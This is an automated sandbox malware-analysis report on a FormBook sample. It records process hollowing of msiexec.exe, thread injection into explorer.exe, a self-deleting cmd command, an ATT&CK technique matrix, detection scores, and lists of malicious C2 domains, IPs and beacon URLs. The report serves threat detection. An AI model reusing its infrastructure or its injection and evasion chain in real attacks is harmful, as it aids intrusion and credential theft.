Source: C:\Users\user\Desktop\YvGnm93rap.exe	Section loaded: unknown target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\YvGnm93rap.exe	Thread register set: target process: 3388			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread register set: target process: 3388			Jump to behavior

Queues an APC in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\YvGnm93rap.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Sample uses process hollowing technique

Show sources

Source: C:\Users\user\Desktop\YvGnm93rap.exe

Section unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 2A0000

Jump to behavior

Source: C:\Users\user\Desktop\YvGnm93rap.exe	Process created: C:\Users\user\Desktop\YvGnm93rap.exe {path}			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\YvGnm93rap.exe'			Jump to behavior

Source: explorer.exe, 00000003.00000000.231903702.0000000001398000.00000004.00000020.sdmp	Binary or memory string: ProgmanamF
Source: explorer.exe, 00000003.00000000.232163609.0000000001980000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 00000003.00000000.245297462.000000000871F000.00000004.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000003.00000000.232163609.0000000001980000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000003.00000000.232163609.0000000001980000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\YvGnm93rap.exe	Queries volume information: C:\Users\user\Desktop\YvGnm93rap.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\YvGnm93rap.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000002.00000002.266553738.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.267101341.0000000001200000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.266813664.0000000000EA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.227971246.00000000040B9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 2.2.YvGnm93rap.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.YvGnm93rap.exe.400000.0.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000002.00000002.266553738.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.267101341.0000000001200000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.266813664.0000000000EA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.227971246.00000000040B9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 2.2.YvGnm93rap.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.YvGnm93rap.exe.400000.0.raw.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Shared Modules1	DLL Side-Loading1	Process Injection512	Masquerading1	Input Capture1	Security Software Discovery221	Remote Services	Input Capture1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	DLL Side-Loading1	Virtualization/Sandbox Evasion3	LSASS Memory	Virtualization/Sandbox Evasion3	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Ingress Tool Transfer3	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Disable or Modify Tools1	Security Account Manager	Process Discovery2	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol3	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Process Injection512	NTDS	Remote System Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol3	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Deobfuscate/Decode Files or Information1	LSA Secrets	System Information Discovery112	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Obfuscated Files or Information4	Cached Domain Credentials	System Owner/User Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Software Packing13	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Timestomp1	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	DLL Side-Loading1	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
YvGnm93rap.exe	46%	Virustotal		Browse
YvGnm93rap.exe	26%	ReversingLabs	Win32.Trojan.Wacatac
YvGnm93rap.exe	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
2.2.YvGnm93rap.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen		Download File

Domains

Source	Detection	Scanner	Label	Link
www.tomatrader.com	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
bodyfuelrtd.com	34.102.136.180	true	true		unknown
crafteest.com	34.102.136.180	true	true		unknown
www.tomatrader.com	37.48.65.150	true	true	0%, Virustotal, Browse	unknown
100feetpics.com	184.168.131.241	true	true		unknown
www.futbolclubbarcelona.soccer	54.208.77.124	true	true		unknown
www.4037a.com	104.233.238.207	true	true		unknown
www.ondesign03.net	135.181.31.212	true	true		unknown
reversehomeloansmiami.com	34.102.136.180	true	true		unknown
www.puzelhome.com	195.78.66.137	true	true		unknown
www.tootleshook.com	unknown	unknown	true		unknown
www.hechoenvegas.net	unknown	unknown	true		unknown
www.100feetpics.com	unknown	unknown	true		unknown
www.jizhoujsp.com	unknown	unknown	true		unknown
www.jorgegiljewelry.com	unknown	unknown	true		unknown
www.amazon-support-recovery.com	unknown	unknown	true		unknown
www.8million-lr.com	unknown	unknown	true		unknown
www.reversehomeloansmiami.com	unknown	unknown	true		unknown
www.crafteest.com	unknown	unknown	true		unknown
www.bodyfuelrtd.com	unknown	unknown	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.apache.org/licenses/LICENSE-2.0	explorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com	explorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com/designersG	explorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com/designers/?	explorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cn/bThe	explorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers?	explorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.tiro.com	explorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers	explorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.goodfont.co.kr	explorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.carterandcone.coml	explorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.sajatypeworks.com	explorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.typography.netD	explorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers/cabarga.htmlN	explorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cn/cThe	explorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htm	explorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://fontfabrik.com	explorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.founder.com.cn/cn	explorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers/frere-jones.html	explorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.jiyu-kobo.co.jp/	explorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.galapagosdesign.com/DPlease	explorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers8	explorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.fonts.com	explorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.sandoll.co.kr	explorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.urwpp.deDPlease	explorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.zhongyicts.com.cn	explorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.sakkal.com	explorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
104.233.238.207	unknown	United States	54600	PEGTECHINCUS	true
195.78.66.137	unknown	Poland	41079	SUPERHOST-PL-ASPL	true
37.48.65.150	unknown	Netherlands	60781	LEASEWEB-NL-AMS-01NetherlandsNL	true
34.102.136.180	unknown	United States	15169	GOOGLEUS	true
135.181.31.212	unknown	Germany	24940	HETZNER-ASDE	true
54.208.77.124	unknown	United States	14618	AMAZON-AESUS	true
184.168.131.241	unknown	United States	26496	AS-26496-GO-DADDY-COM-LLCUS	true

General Information

Joe Sandbox Version:	31.0.0 Red Diamond
Analysis ID:	339311
Start date:	13.01.2021
Start time:	20:46:30
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 9m 22s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	YvGnm93rap.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	34
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@7/1@19/7
EGA Information:	Failed
HDC Information:	Successful, ratio: 5.3% (good quality ratio 5.2%) Quality average: 78.5% Quality standard deviation: 24.6%
HCA Information:	Successful, ratio: 100% Number of executed functions: 48 Number of non-executed functions: 173
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 168.61.161.212, 104.43.193.48, 23.210.248.85, 51.11.168.160, 93.184.221.240, 92.122.213.247, 92.122.213.194, 20.54.26.129, 51.104.139.180, 52.155.217.156 Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, wu.azureedge.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, audownload.windowsupdate.nsatc.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, wu.wpc.apr-52dd2.edgecastdns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, fs.microsoft.com, wu.ec.azureedge.net, db3p-ris-pf-prod-atm.trafficmanager.net, ris-prod.trafficmanager.net, displaycatalog.md.mp.microsoft.com.akadns.net, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, blobcollector.events.data.trafficmanager.net

Simulations

Behavior and APIs

Time	Type	Description
20:47:27	API Interceptor	1x Sleep call for process: YvGnm93rap.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
104.233.238.207	PO890299700006.xlsx	Get hash	malicious	Browse	www.4037a.com/8rg4/?SBZ=epg8b&cF=g6ZLIXg6U3PM2jBy80KgA5ROz8OC0OKcGU+g5VdTIBZp3IVPS0UwemMzd4i5Tdxhf5s4zw==
104.233.238.207	fdxzZJ99bS.exe	Get hash	malicious	Browse	www.4037a.com/8rg4/?jP=g6ZLIXg/UwPI2zN++0KgA5ROz8OC0OKcGUmwlWBSMhZo355JVkF8Ii0xedOvXN1SU6xI&bv4=YVM8sjIPCHML-RZP
37.48.65.150	ACH ADVICE ON 16-11-2020.exe	Get hash	malicious	Browse	www.amq-studio.com/bw82/?Jdvd=gLCh8Pmco04cQJFz5kEbI+9zVUDe026h2rroMltMK5XxJzyLw078MOm2wMjAmUaNDVQi312QEQ==&ndZTF4=R2Mdt
37.48.65.150	15ORDER PDF.exe	Get hash	malicious	Browse	www.missegghostel.com/nk7/?iZ50-Pi=kQbvMjY6ZRRnyKo6rgZWiSUj2tjUVSLFE864JaD3Fe5PYincjrqsErZF4PFktR+t6XDcmgqXJpJoTAnn6zSI&jnc=SlDDf8EHaXJl
34.102.136.180	Order_00009.xlsx	Get hash	malicious	Browse	www.brainandbodystrengthcoach.com/csv8/?1bwhC=4rzgp1jcc8l4Wxs4KztLQnvubqNqMY/2ozhXYXCY6yGJDbul1z8E6+SozVJniMc1Iz21RA==&tB=TtdpPpwhOlt
	13-01-21.xlsx	Get hash	malicious	Browse	www.kolamart.com/bw82/?x2J8=U5qlNe3qvCiRDMVNZAk3bGcrOcPwpu2hHSyAkQWR0ho6UxGTq/9WR3TB3nENm+o2HqQ7BQ==&Ab=gXuD_lh8bfV4RN
	NEW 01 13 2021.xlsx	Get hash	malicious	Browse	www.gdsjgf.com/bw82/?UL0xqd7P=7KG5rMnMQSi+1zMSyyvwq06b8xrmRTVdiDQe9ch18oMrwrVTJ7b27nrbU/HrWldfz0eoHA==&CXi4A=gXrXRfH0yDoHcf-
	PO85937758859777.xlsx	Get hash	malicious	Browse	www.bodyfuelrtd.com/8rg4/?RJ=A4ItsHP7WirPGvorxE1FqdRUH2iuHEJ7Bx0GuGGPjza4UX3M9OXu5uVQhTJ1ITDXtosJtw==&LFQHH=_pgx3Rd
	Order_385647584.xlsx	Get hash	malicious	Browse	www.oohdough.com/csv8/?NP=oR+kRp92OlWNPHb8tFeSfFFusuQV5SLrlvHcvTTApHN9lxDZF+KzMj/NshbaIk6/gJtwpQ==&nN6l9T=K0GdGdPX7JyL
	PO#218740.exe	Get hash	malicious	Browse	www.epochryphal.com/wpsb/?Wxo=n7b+ISrk/mPyWzbboTpvP41tNOKzDU5etPpa3uuDPgrT9THM2mbO6pyh4trMr+rUEpul&vB=lhv8
	20210111 Virginie.exe	Get hash	malicious	Browse	www.mrkabaadiwala.com/ehxh/?Gzux=8Ka3Lv4ePZYbHHrfWWyIjg6yKJpjzOn7QTDTNOD0A86ZD78kMrm+GgFnyvrieFQhDFXfm2RQfw==&AnB=O0DToLD8K
	20210113155320.exe	Get hash	malicious	Browse	www.ortigiarealty.com/dkk/?BZ=59qCdC3RMUvEyWKLbbpm6Z+GlV/JTwbDjS9GwZYTXRwVfK7Z9ENGl/302ncjjG4TtqPC&I6A=4hOhA0
	13012021.exe	Get hash	malicious	Browse	www.sydiifinancial.com/rbg/?-ZV4gjY=zsOc27F1WxfzCuYGlMZHORhUu2hDO+A8T5/oUCY+tOSiKp0YV+JX8kcBbP6nsiP5HbIi&-ZSl=1bgPBf
	Po-covid19 2372#w2..exe	Get hash	malicious	Browse	www.thesaltlifestyle.com/p95n/?u6ihA=cjlpdRL8ZtfDvB1&oH5h=BBaWJPlPEO+nvtMqhmqrcRgDtKq1LKrnuc6I0tDI+4mn5icveD46W7DXUUudv5GhOCct
	FtLroeD5Kmr6rNC.exe	Get hash	malicious	Browse	www.abilitiesin.com/umSa/?8p=z9MTiPW3cvjSA5QkES0lRL7QE5QWzpSIb/5mf6QApKD6hYKwb/M4i12nx+gX2coGSm9PIjo5qw==&o2=jL30vpcXe
	6blnUJRr4yKrjCS.exe	Get hash	malicious	Browse	www.vettedwealthmanagement.com/umSa/?ET8T=brJeVU7eljMQcn5t6nrZLyoDpHpFr+iqwzUSRB88e+cRILPvJ2TiW12sA30gV7y33iXX&URfl=00DdGJE8CBEXFLip
	Consignment Document PL&BL Draft.exe	Get hash	malicious	Browse	www.basalmeals.com/h3qo/?CR=nh/gKqoyV5HeFjYxMy0eFbMJOpM49Sz3DGf/FH2Dw3liEqigPonoEfAZFGiauGMw1oau&RX=dnC44rW8qdHLY2q
	5DY3NrVgpI.exe	Get hash	malicious	Browse	www.schustermaninterests.com/de92/?FdC4E2D=otFI+gArfm9oxno+NlFHPe8CZ87dio0DjOpD7CEQ1ohXI6jwcMVL1BNDFt16zf60LSstTEfOYg==&AjR=9r4L1
	xrxSVsbRli.exe	Get hash	malicious	Browse	www.luxpropertyandassociates.com/nki/?yrsdQvAx=9rwO08mLgykW/+F5WoH4KAy1ieMCsMl+05AKyLP7HaXoaQuR30wAwJPKQnvqcJUpdIyD&D8h8=kHux
	3S1VPrT4IK.exe	Get hash	malicious	Browse	www.qiemfsolutions.com/xle/?D8bDL=df7alruH/sVOZEWxdb4cimNlzghqglI+JQbYN3M53vXLFmJTlVjRvjRu86vT99I8VeyiFG/dAw==&nbph=uzu87Xq
	AOA4sx8Z7l.exe	Get hash	malicious	Browse	www.eventsdonevirtually.com/c8so/?Wx=JxEHfAEgu9b4xQJDcyjTWSaEjlpoxhWg+fCl4c24OKbRsAQRgKKiPuXHFwp0UmB835cw&vB=lhr0E
	g2fUeYQ7Rh.exe	Get hash	malicious	Browse	www.multipleofferonline.com/nki/?-Z1l=5yWKC4X4OOjUIUftTYCRYdpq8XI+R2ST+EfenRWsFQpL7Lmr0RV0+cHmGR5gosgcZWiS+YlJJw==&5ju=UlSpo
	pHUWiFd56t.exe	Get hash	malicious	Browse	www.brainandbodystrengthcoach.com/csv8/?Rxl=4rzgp1jZc7l8Whg0IztLQnvubqNqMY/2oz5HEUeZ+SGIDqCjyjtIs6qqwzFhp9I+dVCC&LJB=GbtlyLR0j
	invoice.xlsx	Get hash	malicious	Browse	www.cleverwares.com/c8so/?AFNDR=7n20cVCpbL7dqxQ&BBW=P253+QYRdhKTDdzjq4pa7Wp7svBpTNddHFol+cUWSKGzAXl94gLhBIvIcI/Xp4fU197lMA==

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
www.ondesign03.net	6OUYcd3GIs.exe	Get hash	malicious	Browse	135.181.31.212
www.ondesign03.net	PO 24000109490.xlsx	Get hash	malicious	Browse	135.181.31.212
www.tomatrader.com	5j6RsnL8zx.exe	Get hash	malicious	Browse	185.107.56.60
www.futbolclubbarcelona.soccer	fdxzZJ99bS.exe	Get hash	malicious	Browse	54.208.77.124
www.4037a.com	PO890299700006.xlsx	Get hash	malicious	Browse	104.233.238.207
www.4037a.com	fdxzZJ99bS.exe	Get hash	malicious	Browse	104.233.238.207

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
PEGTECHINCUS	AOA4sx8Z7l.exe	Get hash	malicious	Browse	154.212.39.175
	PO890299700006.xlsx	Get hash	malicious	Browse	104.233.238.207
	5j6RsnL8zx.exe	Get hash	malicious	Browse	104.233.182.201
	fdxzZJ99bS.exe	Get hash	malicious	Browse	104.233.238.207
	inv.exe	Get hash	malicious	Browse	199.188.106.27
	hUWiJym6fy.exe	Get hash	malicious	Browse	156.247.94.68
	TT 18,000.00 euro.xlsx	Get hash	malicious	Browse	154.212.39.234
	fSBya4AvVj.exe	Get hash	malicious	Browse	154.212.39.234
	C03N224Hbu.exe	Get hash	malicious	Browse	107.149.46.103
	EME.39134.xlsx	Get hash	malicious	Browse	107.149.46.103
	rvNT4kv6bg.exe	Get hash	malicious	Browse	107.149.195.152
	noah crypt(1).exe	Get hash	malicious	Browse	107.149.249.27
	NOAH FORMBUK_crypted.exe	Get hash	malicious	Browse	107.149.23.200
	SKM109482.exe	Get hash	malicious	Browse	107.149.195.152
	New Purchase Order 501,689$.exe	Get hash	malicious	Browse	104.233.180.146
	New Purchase Order 501,689$.exe	Get hash	malicious	Browse	104.233.249.194
	vic2.exe	Get hash	malicious	Browse	154.201.73.160
	sample.exe	Get hash	malicious	Browse	142.0.139.129
	QUOTATION.exe	Get hash	malicious	Browse	107.149.151.106
	gmTRWANbg8.exe	Get hash	malicious	Browse	104.233.224.237
SUPERHOST-PL-ASPL	990109.exe	Get hash	malicious	Browse	195.78.66.50
	http://brudna.prawda.vot.pl	Get hash	malicious	Browse	195.78.66.201
	qkN4OZWFG6.exe	Get hash	malicious	Browse	195.78.66.50
	kvdYhqN3Nh.exe	Get hash	malicious	Browse	195.78.66.50
	3yhnaDfaxn.exe	Get hash	malicious	Browse	195.78.66.50
	inklusionsvereinbarung_muster_bayern.js	Get hash	malicious	Browse	185.204.219.237
	inklusionsvereinbarung_muster_bayern.js	Get hash	malicious	Browse	185.204.219.237
	tarifvertrag_knappschaft_bahn_see.js	Get hash	malicious	Browse	185.204.219.237
	tarifvertrag_knappschaft_bahn_see.js	Get hash	malicious	Browse	185.204.219.237
	http://jurczyk.biz/piotrek/IJilgckESlY/	Get hash	malicious	Browse	195.114.1.39
	http://jurczyk.biz/aplikacje/llyv22ukxl/oav1gts4531670007520skspxws445doh14ry	Get hash	malicious	Browse	195.114.1.39
	ReviewDocument.pdf	Get hash	malicious	Browse	195.114.1.40
	http://dentalspabusko.pl/Paid-Invoice-Credit-Card-Receipt/	Get hash	malicious	Browse	193.218.152.52
	31#U7e6ZB487UR59Q3.js	Get hash	malicious	Browse	195.114.0.64
	31#U7e6ZB487UR59Q3.js	Get hash	malicious	Browse	195.114.0.64
	cssvs.doc	Get hash	malicious	Browse	195.242.116.44
	cssvs.doc	Get hash	malicious	Browse	195.242.116.44
	Emotet.doc	Get hash	malicious	Browse	195.114.1.181
	Emotet4.doc	Get hash	malicious	Browse	195.114.1.181
